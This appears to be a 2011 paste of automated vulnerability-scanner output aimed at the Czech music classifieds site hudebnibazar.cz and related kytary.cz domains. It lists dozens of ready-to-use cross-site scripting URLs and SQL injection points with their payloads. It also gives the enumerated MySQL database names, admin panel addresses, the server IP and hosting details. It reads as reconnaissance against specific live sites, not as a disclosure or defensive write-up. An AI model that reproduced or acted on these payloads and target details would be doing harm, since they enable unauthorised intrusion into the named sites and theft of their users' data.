sroub3k

hudebnibazar.cz

Aug 20th, 2011
* XSS - Cross-site Scripting

Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79

- method GET
http://hudebnibazar.cz/smazat.php?"></style><script>alert(9)</script>
http://hudebnibazar.cz/formular.php?"><object/onerror=alert(9)>
http://hudebnibazar.cz/index.php?page=1&ins=25&order="><script>alert(9)</script>&kategorie=0
http://hudebnibazar.cz/index.php?page=1&ins=25&order=3&kategorie='"--></style></script><script>alert(0x00064D)</script>
http://hudebnibazar.cz/formular.php?ID=641587&page=1&kategorie=0&nabpop=vse&region=3&ins="><object/onerror=alert(9)>&order=3
http://hudebnibazar.cz/formular.php?ID=641587&page=1&kategorie=0&nabpop=vse&region=3&ins=25&order='"--></style></script><script>alert(0x000897)</script>
http://hudebnibazar.cz/inzerat.php?ID=641587&page=1&kategorie=0&nabpop=vse&region=3&ins='"--></style></script><script>alert(0x00089C)</script>&order=3
http://hudebnibazar.cz/smazat.php?ID=641587&page=1&kategorie=0&nabpop=vse&region='"--></style></script><script>alert(0x0008A9)</script>&ins=25&order=3
http://hudebnibazar.cz/inzerat.php?ID=641587&page=1&kategorie=0&nabpop=vse&region=3&ins=25&order='"--></style></script><script>alert(0x0008AA)</script>
http://hudebnibazar.cz/smazat.php?page=1&kategorie='"--></style></script><script>alert(0x0005E9)</script>&nabpop=vse&region=3&ins=25&order=3
http://hudebnibazar.cz/formular.php?page=1&kategorie='"--></style></script><script>alert(0x0005EB)</script>&nabpop=vse&region=3&ins=25&order=3
http://hudebnibazar.cz/formular.php?page=1&kategorie="></style><script>alert(9)</script>&nabpop=vse&region=3&ins=25&order=3
http://hudebnibazar.cz/index.php?page=2&kategorie='"--></style></script><script>alert(0x000631)</script>&nabpop=vse&region=3&fulltext=3&ins=25&order=3
http://hudebnibazar.cz/index.php?page=1'"--></style></script><script>alert(0x0005F3)</script>&ins=25&order=3&kategorie=0
http://hudebnibazar.cz/index.php?page=2'"--></style></script><script>alert(0x000601)</script>&kategorie=0&nabpop=vse&region=3&fulltext=3&ins=25&order=3
http://hudebnibazar.cz/index.php?page=1&kategorie='"--></style></script><script>alert(0x000605)</script>&nabpop=vse&region=3&ins=25&order=3
http://hudebnibazar.cz/inzerat.php?'"--></style></script><script>alert(0x000624)</script>
http://hudebnibazar.cz/index.php?page=1&ins='"--></style></script><script>alert(0x000610)</script>&order=3&kategorie=0
http://hudebnibazar.cz/index.php?page=1&ins="><body onload=alert(9)>&order=3&kategorie=0
http://hudebnibazar.cz/inzerat.php?ID='"--></style></script><script>alert(0x000632)</script>&page=1&kategorie=0&nabpop=vse&region=3&ins=25&order=3
http://hudebnibazar.cz/formular.php?ID='"--></style></script><script>alert(0x000653)</script>&page=1&kategorie=0&nabpop=vse&region=3&ins=25&order=3
http://hudebnibazar.cz/formular.php?page=1&kategorie=0&nabpop=vse&region=3&ins='"--></style></script><script>alert(0x00065E)</script>&order=3
http://hudebnibazar.cz/smazat.php?page=1&kategorie=0&nabpop=vse&region='"--></style></script><script>alert(0x000671)</script>&ins=25&order=3
http://hudebnibazar.cz/smazat.php?ID='"--></style></script><script>alert(0x00067F)</script>&page=1&kategorie=0&nabpop=vse&region=3&ins=25&order=3
http://hudebnibazar.cz/index.php?page=1&kategorie=0&nabpop=vse&region='"--></style></script><script>alert(0x00069A)</script>&ins=25&order=3
http://hudebnibazar.cz/index.php?page=2&kategorie=0&nabpop=vse&region='"--></style></script><script>alert(0x0006BB)</script>&fulltext=3&ins=25&order=3
http://hudebnibazar.cz/formular.php?ID=641587&page=1'"--></style></script><script>alert(0x0006CC)</script>&kategorie=0&nabpop=vse&region=3&ins=25&order=3
http://hudebnibazar.cz/formular.php?page=1&kategorie=0&nabpop=vse&region=3&ins=25&order='"--></style></script><script>alert(0x0006D8)</script>
http://hudebnibazar.cz/smazat.php?page=1&kategorie=0&nabpop=vse&region=3&ins='"--></style></script><script>alert(0x0006DE)</script>&order=3
http://hudebnibazar.cz/inzerat.php?typ=nahlasit&ID='"--></style></script><script>alert(0x0006EF)</script>&page=1&kategorie=0&nabpop=vse&region=3&ins=25&order=3
http://hudebnibazar.cz/inzerat.php?ID=641587&page=1'"--></style></script><script>alert(0x000703)</script>&kategorie=0&nabpop=vse&region=3&ins=25&order=3
http://hudebnibazar.cz/formular.php?ID=641587&page=1&kategorie='"--></style></script><script>alert(0x000718)</script>&nabpop=vse&region=3&ins=25&order=3
http://hudebnibazar.cz/smazat.php?ID=641587&page=1'"--></style></script><script>alert(0x000754)</script>&kategorie=0&nabpop=vse&region=3&ins=25&order=3
http://hudebnibazar.cz/inzerat.php?ID='"--></style></script><script>alert(0x000796)</script>
http://hudebnibazar.cz/inzerat.php?ID=641587&page=1&kategorie='"--></style></script><script>alert(0x0007A4)</script>&nabpop=vse&region=3&ins=25&order=3
http://hudebnibazar.cz/smazat.php?ID=641587&page=1&kategorie='"--></style></script><script>alert(0x0007B3)</script>&nabpop=vse&region=3&ins=25&order=3
http://hudebnibazar.cz/smazat.php?ID=641587&page=1&kategorie="></style><script>alert(9)</script>&nabpop=vse&region=3&ins=25&order=3
http://hudebnibazar.cz/index.php?page=1&kategorie=0&nabpop=vse&region=3&ins='"--></style></script><script>alert(0x0007B9)</script>&order=3
http://hudebnibazar.cz/index.php?page=2&kategorie=0&nabpop=vse&region=3&fulltext='"--></style></script><script>alert(0x0007CF)</script>&ins=25&order=3
http://hudebnibazar.cz/smazat.php?page=1&kategorie=0&nabpop=vse&region=3&ins=25&order='"--></style></script><script>alert(0x0007DF)</script>
http://hudebnibazar.cz/smazat.php?page=1&kategorie=0&nabpop=vse&region=3&ins=25&order="><object/onerror=alert(9)>
http://hudebnibazar.cz/inzerat.php?err=as&typ=odpoved&ID=\'\"--></style></script><script>netsparker(0x0008FA)</script>&NactiZeSess=1&page=1&kategorie=0&nabpop=vse&region=&ins=25&order=
http://hudebnibazar.cz/inzerat.php?err=as&typ=odpoved&ID=641587\0\'\"--></style></script><script>netsparker(0x00093D)</script>&NactiZeSess=1&page=1&kategorie=0&nabpop=vse&region=&ins=25&order=
http://hudebnibazar.cz/inzerat.php?err=as&typ=nahlasit&ID=\'\"--></style></script><script>netsparker(0x000A1F)</script>&NactiZeSess=1&page=1&kategorie=0&nabpop=vse&region=&ins=25&order=
http://hudebnibazar.cz/index.php?page=1&kategorie=0&nabpop=vse&region=3&ins=25&order='"--></style></script><script>alert(0x00091C)</script>
http://hudebnibazar.cz/smazat.php?ID=641587&page=1&kategorie=0&nabpop=vse&region=3&ins=25&order='"--></style></script><script>alert(0x000961)</script>
http://hudebnibazar.cz/index.php?page=2&kategorie=0&nabpop=vse&region=3&fulltext=3&ins="></script><script>alert(9)</script>&order=3
http://hudebnibazar.cz/index.php?page=2&kategorie=0&nabpop=vse&region=3&fulltext=3&ins=25&order='"--></style></script><script>alert(0x00096F)</script>
http://hudebnibazar.cz/zaslatheslo.php?'"--></style></script><script>alert(0x000999)</script>
http://hudebnibazar.cz/zaslatheslo.php?ID=641587&back='"--></style></script><script>alert(0x0009B8)</script>
http://hudebnibazar.cz/inzerat.php?typ=nahlasit&ID=641587&page=1&kategorie=0&nabpop=vse&region=3&ins='"--></style></script><script>alert(0x0009E2)</script>&order=3
http://hudebnibazar.cz/inzerat.php?typ=nahlasit&ID=641587&page=1&kategorie=0&nabpop=vse&region=3&ins=25&order='"--></style></script><script>alert(0x0009EC)</script>

http://hudebnibazar.cz/index.php/"ns="alert(0x0005D6)
Parameter Name: URI-BASED
Parameter Type: RawUrlInjection
Attack Pattern: /"ns="alert(0x0005D6)

- method POST

http://hudebnibazar.cz/formular.php?err=as&NactiZeSess=1
Parameter Name: kategorie
Parameter Type: Post
Attack Pattern: "></script><script>alert(9)</script>
-
http://hudebnibazar.cz/smazat.php
Parameter Name: page
Parameter Type: Post
Attack Pattern: 1'"--></style></script><script>alert(0x000974)</script>
-
http://hudebnibazar.cz/smazat.php
Parameter Name: region
Parameter Type: Post
Attack Pattern: '"--></style></script><script>alert(0x00097F)</script>
-
http://hudebnibazar.cz/inzerat.php?err=as&typ=odpoved&ID=641587&NactiZeSess=1&page=1&kategorie=0&nabpop=vse&region=&ins=25&order=
Parameter Name: replyto
Parameter Type: Post
Attack Pattern: '"--></style></script><script>alert(0x0009AD)</script>
-
http://hudebnibazar.cz/inzerat.php?err=as&typ=odpoved&ID=641587&NactiZeSess=1&page=1&kategorie=0&nabpop=vse&region=&ins=25&order=\0\'\"--></style></script><script>netsparker(0x0009C5)</script>
Parameter Name: sess
Parameter Type: Post
Attack Pattern: page=1&kategorie=0&nabpop=vse&region=&ins=25&order='"--></style></script><script>alert(0x0009C5)</script>
-
http://hudebnibazar.cz/formular.php?ID=\'\"--></style></script><script>netsparker(0x000A63)</script>&err=he&NactiZeSess=1
Parameter Name: ID
Parameter Type: Post
Attack Pattern: '"--></style></script><script>alert(0x000A63)</script>
-
http://hudebnibazar.cz/inzerat.php?err=as&typ=odpoved&ID=641587&NactiZeSess=1&page=1&kategorie=0&nabpop=vse&region=&ins=25&order=
Parameter Name: textodpovedi
Parameter Type: Post
Attack Pattern: '"--></style></script><script>alert(0x000A04)</script>
-------------------------------------------------------------------------

* [Possible] Permanent Cross-site Scripting

Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79

Vulnerable URL: http://hudebnibazar.cz/formular.php?err=as&NactiZeSess=1
Injection URL: http://hudebnibazar.cz/formular.php?err=as&NactiZeSess=1
Parameter Name: heslo2
Parameter Type: Post
Attack Pattern: 'AND 1=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+'

Vulnerable URL: http://hudebnibazar.cz/inzerat.php?err=as&typ=nahlasit&ID=641587&NactiZeSess=1&page=1&kategorie=0&nabpop=vse&region=&ins=25&order=
Injection URL: http://hudebnibazar.cz/inzerat.php?err=as&typ=nahlasit&ID=641587&NactiZeSess=1&page=1&kategorie=0&nabpop=vse&region=&ins=25&order=
Parameter Name: p_spam
Parameter Type: Post
Attack Pattern: '+NSFTW+'

-------------------------------------------------------------------------

* COOKIE SQL INJECTION

ReferURL http://hudebnibazar.cz/index.php^fulltext=___640085
Parameter fulltext=___640085
Type String
KWordActionURL Electro
-
ReferURL http://hudebnibazar.cz/index.php?order=&kategorie=0&page=1^ins=25
Parameter ins=25
Type Integer
KWordActionURL Electro

-------------------------------------------------------------------------
* URL SQL INJECTION

http://hudebnibazar.cz/index.php?page=1&nabpop=vse&region=&ins=25&order=&kategorie=310000
http://hudebnibazar.cz/index.php?page=1&nabpop=vse&region=&ins=25&order=&kategorie=99999999
http://hudebnibazar.cz/smazat.php?page=1&kategorie=310000&nabpop=vse&region=&ins=25&order=&ID=640085
http://hudebnibazar.cz/smazat.php?page=1&kategorie=310000&nabpop=vse&region=&ins=25&order=&ID=99999999
http://hudebnibazar.cz/formular.php?page=1&kategorie=310000&nabpop=vse&region=&ins=25&order=&ID=640085
http://hudebnibazar.cz/formular.php?page=1&kategorie=310000&nabpop=vse&region=&ins=25&order=&ID=99999999
http://hudebnibazar.cz/inzerat.php?page=1&kategorie=310000&nabpop=vse&region=&ins=25&order=&ID=640085
http://hudebnibazar.cz/inzerat.php?page=1&kategorie=310000&nabpop=vse&region=&ins=25&order=&ID=99999999
http://hudebnibazar.cz/inzerat.php?order=&ID=640085&page=1&kategorie=310000&nabpop=vse&region=&ins=25
http://hudebnibazar.cz/zaslatheslo.php?back=smazat&ID=640085
http://hudebnibazar.cz/zaslatheslo.php?back=smazat&ID=99999999

-------------------------------------------------------------------------
* Database User Has Admin Privileges

Vulnerability Classifications: OWASP A6 CWE-16

http://hudebnibazar.cz/formular.php?page=1&kategorie=-1 OR 17-7=10&nabpop=vse&region=3&ins=25&order=3
Parameter Name: kategorie
Parameter Type: Querystring
Attack Pattern: -1 OR 17-7=10

-------------------------------------------------------------------------

* Boolean Based SQL Injection

Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98

http://hudebnibazar.cz/smazat.php?page=1&kategorie=-1 OR 17-7=10&nabpop=vse&region=3&ins=25&order=3
Parameter Name: kategorie
Parameter Type: Querystring
Attack Pattern: -1 OR 17-7=10

http://hudebnibazar.cz/formular.php?page=1&kategorie=-1 OR 17-7=10&nabpop=vse&region=3&ins=25&order=3
Parameter Name: kategorie
Parameter Type: Querystring
Attack Pattern: -1 OR 17-7=10

http://hudebnibazar.cz/index.php?page=1&kategorie=-1 OR 17-7=10&nabpop=vse&region=3&ins=25&order=3
Parameter Name: kategorie
Parameter Type: Querystring
Attack Pattern: -1 OR 17-7=10

http://hudebnibazar.cz/index.php?page=1&ins=25&order=3&kategorie=-1 OR 17-7=10
Parameter Name: kategorie
Parameter Type: Querystring
Attack Pattern: -1 OR 17-7=10

http://hudebnibazar.cz/formular.php?ID=-1 OR 17-7=10&page=1&kategorie=0&nabpop=vse&region=3&ins=25&order=3
Parameter Name: ID
Parameter Type: Querystring
Attack Pattern: -1 OR 17-7=10

http://hudebnibazar.cz/smazat.php?ID=-1 OR 17-7=10&page=1&kategorie=0&nabpop=vse&region=3&ins=25&order=3
Parameter Name: ID
Parameter Type: Querystring
Attack Pattern: -1 OR 17-7=10

http://hudebnibazar.cz/inzerat.php?typ=nahlasit&ID=-1 OR 17-7=10&page=1&kategorie=0&nabpop=vse&region=3&ins=25&order=3
Parameter Name: ID
Parameter Type: Querystring
Attack Pattern: -1 OR 17-7=10

http://hudebnibazar.cz/inzerat.php?ID=-1 OR 17-7=10
Parameter Name: ID
Parameter Type: Querystring
Attack Pattern: -1 OR 17-7=10

http://hudebnibazar.cz/smazat.php
Parameter Name: kategorie
Parameter Type: Post
Attack Pattern: -1 OR 17-7=10

http://hudebnibazar.cz/zaslatheslo.php?ID=-1 OR 17-7=10&back=formular
Parameter Name: ID
Parameter Type: Querystring
Attack Pattern: -1 OR 17-7=10
-------------------------------------------------------------------------

* Password Transmitted Over HTTP

Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319

http://hudebnibazar.cz/formular.php?ID=641587&err=he&NactiZeSess=1
Form target action: vloz2db.php
-------------------------------------------------------------------------
* Cookie Not Marked As HttpOnly

Vulnerability Classifications: OWASP A6 CWE-16

http://hudebnibazar.cz/smazat.php?page=1&kategorie=0&nabpop=vse&region=&ins=25&order=
Identified Cookie: lastvisittemp
.
http://hudebnibazar.cz/index.php?page=1&kategorie=0&nabpop=vse&region=&ins=25&order=
Identified Cookie: cook_ins
.
http://hudebnibazar.cz/formular.php?page=1&kategorie=0&nabpop=vse&region=&ins=25&order=
Identified Cookie: lastvisittemp
.
http://hudebnibazar.cz/inzerat.php?ID=641587&page=1&kategorie=0&nabpop=vse&region=&ins=25&order=
Identified Cookie: lastvisittemp
.
http://hudebnibazar.cz/zaslatheslo.php?ID=641587&back=smazat
Identified Cookie: lastvisittemp
.
http://hudebnibazar.cz/odpoved.php
Identified Cookie: PHPSESSID
Parameter Name: asp
Parameter Type: Post
Attack Pattern: data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwOEU1KTwvc2NyaXB0Pg==
.
http://hudebnibazar.cz/vloz2db.php
Identified Cookie: PHPSESSID
Parameter Name: kategorie
Parameter Type: Post
Attack Pattern: '+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'
.
+++++++++++++++++++++++++++++++++++++++++++++++
Servers and their databases

Web Server: Apache
DB Server: MySQL
Current DB: hudebnibazar_cz
Data Bases: information_schema
FuzzyOcr
adminis_kytary_cz
forum_kytary_cz
hudebnibazar_bak
hudebnibazar_cz
hudebnimagazin_cz
iphone_inzerce
iphonebazar_cz
mail
mysql
openx_kytary_cz
reklama_kytary_cz
search_engine_position

http://hudebniforum.cz - http://hudebniforum.cz/hudebnibazar-cz
http://hudebnimagazin.cz
http://kytary.cz - http://eshop.kytary.cz
---------------------------------------

http://iphonebazar.cz

XSS
Vulnerable URL : http://iphonebazar.cz/?q=node/'" ns=netsparker(0x000CEF) &page='" ns=alert(0x000CEF)

---------------------------------------
http://forum.kytary.cz
http://openx.kytary.cz/www/admin/index.php / Welcome to OpenX
http://reklama.kytary.cz/admin/index.php / Vítejte v Openads
http://kacenka.kytary.cz - shared IP
http://kacenka2.kytary.cz - Not Found, Apache only - 87.236.194.214
---------------------------------------
whois

IP address: 87.236.194.214
CZ
Czech Republic
COOLHOUSING s.r.o.
Organization: Coolhousing

Host of this IP: smtp2.mail.kytary.cz